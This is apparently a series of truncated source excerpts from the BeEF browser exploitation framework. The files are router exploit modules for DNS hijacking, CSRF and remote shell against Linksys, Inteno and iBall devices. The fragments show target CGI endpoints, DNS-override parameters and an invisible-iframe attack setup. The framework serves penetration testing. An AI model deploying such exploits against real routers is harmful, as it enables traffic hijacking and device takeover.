# See the file 'doc/COPYING' for copying permission
#
class Iball_baton_ib_wra150n_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host... |
JavaScript | beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40368/
#
beef:
module:
inteno_eg101r1_voip_dns_hijack:
enable: t... |
Ruby | beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Inteno_eg101r1_voip_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', ... |
JavaScript | beef/modules/exploits/router/linksys_befsr41_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var timeout = 15;
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
befsr41_if... |
YAML | beef/modules/exploits/router/linksys_befsr41_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Lin... |
Ruby | beef/modules/exploits/router/linksys_befsr41_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_befsr41_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/linksys_e2500_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var ti... |
YAML | beef/modules/exploits/router/linksys_e2500_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_e2500_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Links... |
Ruby | beef/modules/exploits/router/linksys_e2500_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_e2500_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' =... |
JavaScript | beef/modules/exploits/router/linksys_e2500_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/apply.cgi';
var dns1 = '<%= @dns1 %>';
var timeout = 15... |
YAML | beef/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_e2500_dns_hijack:
enable: true
category: ["Exploits", "Router"]
name: ... |
Ruby | beef/modules/exploits/router/linksys_e2500_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_e2500_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value... |
JavaScript | beef/modules/exploits/router/linksys_e2500_shell/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var base = '<%= @base %>';
var payload = '<%= @payload %>';
var random = Math.random().toString(36)... |
YAML | beef/modules/exploits/router/linksys_e2500_shell/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_e2500_shell:
enable: true
category: ["Exploits", "Router"]
name: "Link... |
Ruby | beef/modules/exploits/router/linksys_e2500_shell/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_e2500_shell < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' ... |
JavaScript | beef/modules/exploits/router/linksys_wrt54g2_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var ti... |
YAML | beef/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Lin... |
Ruby | beef/modules/exploits/router/linksys_wrt54g2_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_wrt54g2_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/linksys_wrt54g_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var ti... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.